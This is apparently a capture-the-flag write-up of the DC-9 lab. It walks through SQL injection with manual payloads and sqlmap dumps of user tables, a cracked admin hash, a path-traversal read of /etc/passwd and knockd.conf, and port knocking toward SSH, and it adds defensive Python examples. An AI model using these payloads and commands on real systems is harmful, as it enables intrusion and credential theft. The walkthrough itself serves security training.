
DC-9 Penetration Testing Walkthrough

Posted: 2024-02-01 11:44:40

Boot the target VM (NAT mode) and start it.

Scan for live hosts with `arp-scan -l`.


nmap -sS -sV -A -n 192.168.100.22

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:21 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

Here I just scan it directly with the 无糖 tool.

Fingerprint port 80.

Visit it from Kali.

Clicking Display shows what looks like records pulled from a database.

Also take a look at Search and Manage.

Try SQL injection on the Search page; the result is echoed back.

1' or 1=1 #
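The Search box builds its query from the raw `search` value, which is why `1' or 1=1 #` echoes the whole table. The following is an added example (not DC-9's own code) that reproduces the defect beside the parameterized fix, using an in-memory SQLite stand-in for the Staff database with constructed rows; since SQLite's line comment is `-- ` rather than MySQL's `#`, the payload is written with `-- `.

```python
import sqlite3

# Constructed rows standing in for DC-9's Staff.StaffDetails table (assumed schema).
SAMPLE_ROWS = [
    ("Mary", "Moe", "CEO"),
    ("Julie", "Dooley", "Human Resources"),
    ("Fred", "Flintstone", "Systems Administrator"),
]

# The page's payload, with SQLite's `-- ` line comment in place of MySQL's `#`.
PAYLOAD = "1' or 1=1 -- "


def make_db():
    """In-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE StaffDetails (firstname TEXT, lastname TEXT, position TEXT)")
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, term):
    """Builds the SQL text from the user's input, as results.php evidently does.
    A quote in `term` closes the string literal and the remainder is parsed as SQL."""
    sql = ("SELECT firstname, lastname, position FROM StaffDetails "
           f"WHERE lastname = '{term}'")
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Binds the input as a value: the driver keeps it out of the query structure,
    so the same payload is just a lastname that matches nothing."""
    sql = "SELECT firstname, lastname, position FROM StaffDetails WHERE lastname = ?"
    return conn.execute(sql, (term,)).fetchall()


def compare(term):
    """Row counts returned for `term` by the vulnerable and the fixed search."""
    conn = make_db()
    return len(search_vulnerable(conn, term)), len(search_parameterized(conn, term))


if __name__ == "__main__":
    print("legit lookup 'Moe':", compare("Moe"))   # (1, 1)
    print("injection payload:", compare(PAYLOAD))   # (3, 0)
```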

Use sqlmap to enumerate the back end.

Enumerate the databases

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -dbs  
        ___
       __H__                                                                                            
 ___ ___["]_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [.]     | .'| . |                                                                               
|___|_  [']_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:25:47 /2024-01-31/

[20:25:47] [INFO] testing connection to the target URL
[20:25:47] [INFO] testing if the target URL content is stable
[20:25:48] [INFO] target URL content is stable
[20:25:48] [INFO] testing if POST parameter 'search' is dynamic
[20:25:48] [WARNING] POST parameter 'search' does not appear to be dynamic
[20:25:48] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[20:25:48] [INFO] testing for SQL injection on POST parameter 'search'
[20:25:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:25:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                            
[20:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:25:48] [INFO] testing 'Generic inline queries'
[20:25:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:25:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:25:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:08] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                                                                         
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:26:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:26:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:26:18] [INFO] target URL appears to be UNION injectable with 6 columns
[20:26:18] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:26:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:26:26] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[20:26:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:26:26 /2024-01-31/

Enumerate the tables

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -tables

[*] starting @ 20:27:18 /2024-01-31/

[20:27:19] [INFO] resuming back-end DBMS 'mysql' 
[20:27:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:27:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:27:19] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[20:27:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:27:19 /2024-01-31/

Dump the data

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -T UserDetails -dump

[*] starting @ 20:28:35 /2024-01-31/

[20:28:35] [INFO] resuming back-end DBMS 'mysql' 
[20:28:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:28:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:28:35] [INFO] fetching columns for table 'UserDetails' in database 'users'
[20:28:35] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[20:28:35] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/users/UserDetails.csv'                                                                     
[20:28:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:28:35 /2024-01-31/

These are the employees' usernames and passwords.
Now enumerate the other database, Staff.

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -tables

[*] starting @ 20:30:50 /2024-01-31/

[20:30:50] [INFO] resuming back-end DBMS 'mysql' 
[20:30:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:30:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:30:50] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[20:30:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:30:50 /2024-01-31/

Dump the first table, StaffDetails

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T StaffDetails -dump 

[*] starting @ 20:32:02 /2024-01-31/

[20:32:02] [INFO] resuming back-end DBMS 'mysql' 
[20:32:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:32:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:32:02] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[20:32:02] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[20:32:02] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/StaffDetails.csv'                                                                   
[20:32:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:32:02 /2024-01-31/

Dump the second table, Users

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T Users -dump       

[*] starting @ 20:33:02 /2024-01-31/

[20:33:03] [INFO] resuming back-end DBMS 'mysql' 
[20:33:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:33:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[20:33:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[20:33:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:33:10] [INFO] writing hashes to a temporary file '/tmp/sqlmap4b1ullqp35516/sqlmaphashes-b6219vj2.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:33:15] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[20:33:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:33:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:33:26] [INFO] starting 4 processes 
[20:33:35] [INFO] using suffix '1'                                                                     
[20:33:40] [INFO] cracked password 'transorbital1' for user 'admin'                                    
Database: Staff                                                                                        
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+

[20:33:44] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/Users.csv'                                                                                 
[20:33:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:33:44 /2024-01-31/

This yields the admin account and its password hash; I guessed MD5, and sqlmap cracked it automatically.

admin
transorbital1

Try logging in to the admin panel.
Success.
A new menu option has appeared.
It looks like an add-user page, and at the bottom there is a "file does not exist" message, so I guessed there is a file inclusion vulnerability. I had only done a few CTF challenges before and don't know this area deeply, but luckily it isn't hard here.

File inclusion

Prerequisite: 4.8.0 <= phpMyAdmin < 4.8.2

Visiting `http://x.x.x.x:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd` reads `/etc/passwd`, which confirms that the file inclusion vulnerability exists.

So let's try it here.

http://192.168.100.22/addrecord.php?file=../../../../etc/passwd


File does not exist
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
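The `file` parameter of addrecord.php is handed straight to an include, which is why `../../../../etc/passwd` comes back. The added Python example below (not the DC-9 application's code; the include directory and page names are constructed) shows the check that was missing: resolve the requested name under the include directory and refuse anything that escapes it, so traversal, absolute paths and missing files all fail closed, and an allowlist variant that never accepts a path from the URL at all.

```python
import os
import tempfile


def resolve_include(base_dir, requested):
    """Return the real path of `requested` only if it stays inside base_dir.

    None means refuse: empty names, absolute paths, NUL bytes, traversal out of
    base_dir, or a file that does not exist (the page's "File does not exist" case).
    """
    base = os.path.realpath(base_dir)
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    # realpath collapses every ".." and follows symlinks before the check, so
    # "pages/../../etc/passwd" and symlink tricks are judged by where they land.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


# Stricter still: an allowlist of page names (constructed), so the URL carries
# a name, never a path, and unknown names are simply refused.
PAGES = {"welcome": "welcome.php", "display": "display.php", "search": "search.php"}


def resolve_by_name(base_dir, name):
    """Map a bare page name to its file through the allowlist."""
    filename = PAGES.get(name)
    return resolve_include(base_dir, filename) if filename else None


def make_demo_dir():
    """Constructed include directory containing one legitimate page file."""
    d = tempfile.mkdtemp(prefix="dc9-includes-")
    with open(os.path.join(d, "welcome.php"), "w") as fh:
        fh.write("<?php echo 'welcome'; ?>\n")
    return d


if __name__ == "__main__":
    d = make_demo_dir()
    for req in ("welcome.php", "../../../../etc/passwd", "/etc/passwd", "missing.php"):
        print(f"{req!r:28} -> {resolve_include(d, req)}")
```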

Hand it to the chatbot.

This is the content of an /etc/passwd file on a Unix-like system, which holds user account information. Each line represents one user account and gives the username, user ID (UID), group ID (GID), home directory, default shell and other details.

Here are some example users:

Username root, UID 0, GID 0, home directory /root, default shell /bin/bash.
Username marym, UID 1001, GID 1001, home directory /home/marym, default shell /bin/bash.
Username julied, UID 1002, GID 1002, home directory /home/julied, default shell /bin/bash.
Username fredf, UID 1003, GID 1003, home directory /home/fredf, default shell /bin/bash.
Username barneyr, UID 1004, GID 1004, home directory /home/barneyr, default shell /bin/bash.
If you have a specific question or need to perform a particular operation, let me know and I will do my best to help.

Something new:

Port protection: port knocking

The knockd service is a port-knocking daemon. It hides the services a system exposes by adding iptables rules dynamically: a client "knocks" with a custom sequence of port numbers, which makes the system open the wanted service port so it can be reached from outside; when the service is no longer needed, a second custom sequence "closes the door" and the port stops listening externally. This further improves the security of the service and the system. Its default configuration file is /etc/knockd.conf.
Knocking on the ports in order opens the SSH service for connection, so we can use the file inclusion to display the contents of that configuration file.

File does not exist
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
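To see what the recovered knockd.conf actually enforces, here is an added Python model (not knockd's code; the configuration text is copied from the page, the client addresses and timestamps are constructed) that parses the file and replays knockd's per-source matching: each SYN must hit the next port in a door's sequence, an out-of-order knock discards the attempt, an attempt older than seq_timeout is discarded, and only a complete sequence fires the door's command with %IP% filled in.

```python
import re

# Constructed copy of the knockd.conf recovered through the file inclusion.
KNOCKD_CONF = """
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_conf(text):
    """Parse knockd.conf text into {section: {key: value}}; bare keys get None."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1)
            conf[section] = {}
            continue
        if section is None:
            continue
        key, sep, value = line.partition("=")
        conf[section][key.strip()] = value.strip() if sep else None
    return conf


def doors(conf):
    """Every section except [options] is a door: a port sequence and the command it fires."""
    out = {}
    for name, opts in conf.items():
        if name == "options":
            continue
        out[name] = {
            "sequence": [int(p) for p in opts["sequence"].split(",")],
            "timeout": int(opts.get("seq_timeout") or 25),
            "command": opts["command"],
            "flags": opts.get("tcpflags", ""),
        }
    return out


class KnockTracker:
    """Replays knockd's matching, one attempt per (door, source IP).
    Feed it only SYN packets, which is what tcpflags = syn selects."""

    def __init__(self, doors_cfg):
        self.doors = doors_cfg
        self.attempts = {}  # (door, src_ip) -> (next_index, time_of_first_knock)
        self.fired = []     # (door, command with %IP% substituted), in order

    def syn(self, src_ip, dport, t):
        """Process one SYN from src_ip to dport at time t (seconds); return commands fired so far."""
        for name, door in self.doors.items():
            idx, t0 = self.attempts.get((name, src_ip), (0, t))
            if idx and t - t0 > door["timeout"]:
                idx, t0 = 0, t                       # stale attempt: forget it
            if dport != door["sequence"][idx]:
                self.attempts.pop((name, src_ip), None)  # out-of-order knock resets
                continue
            idx += 1
            if idx == len(door["sequence"]):
                self.attempts.pop((name, src_ip), None)
                self.fired.append((name, door["command"].replace("%IP%", src_ip)))
            else:
                self.attempts[(name, src_ip)] = (idx, t0)
        return list(self.fired)


if __name__ == "__main__":
    tracker = KnockTracker(doors(parse_knockd_conf(KNOCKD_CONF)))
    for t, port in enumerate((7469, 8475, 9842)):   # the page's nc knocks, in order
        tracker.syn("192.168.100.5", port, float(t))
    for door, cmd in tracker.fired:
        print(door, "->", cmd)
```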

As usual, ask the chatbot.

You have provided a configuration snippet for managing SSH access with iptables. It defines commands that open and close SSH access based on a specified TCP flag sequence.

Let me explain the information provided:

1. **UseSyslog [openSSH]:**
   - `sequence = 7469,8475,9842`: specifies a TCP flag sequence.
   - `seq_timeout = 25`: sets a timeout value for the sequence.
   - `command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`: the command executed when the specified sequence is detected. It adds a rule that allows TCP traffic to port 22 from the specified IP address.

2. **[closeSSH]:**
   - `sequence = 9842,8475,7469`: this is the close sequence, the reverse of the open sequence.
   - `seq_timeout = 25`: as with the open sequence, sets a timeout value.
   - `command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`: executed to delete the rule and deny TCP traffic to port 22 from the specified IP address.

3. `tcpflags = syn`: both configurations specify sequences based on the SYN flag, which is normally used in the TCP three-way handshake.

Note that the `%IP%` placeholder appears to represent the IP address that triggered the sequence. At run time this placeholder is presumably replaced with the actual IP address.

Before deploying to a production environment, test this configuration in a controlled environment. Also consider the security implications of using this approach to open and close SSH access.

Knock on 7469, 8475 and 9842 one after another.

nmap -p 7469 192.168.100.22
nmap -p 8475 192.168.100.22
nmap -p 9842 192.168.100.22
or
nc 192.168.100.22 7469
nc 192.168.100.22 8475
nc 192.168.100.22 9842

┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 7469        
(UNKNOWN) [192.168.100.22] 7469 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
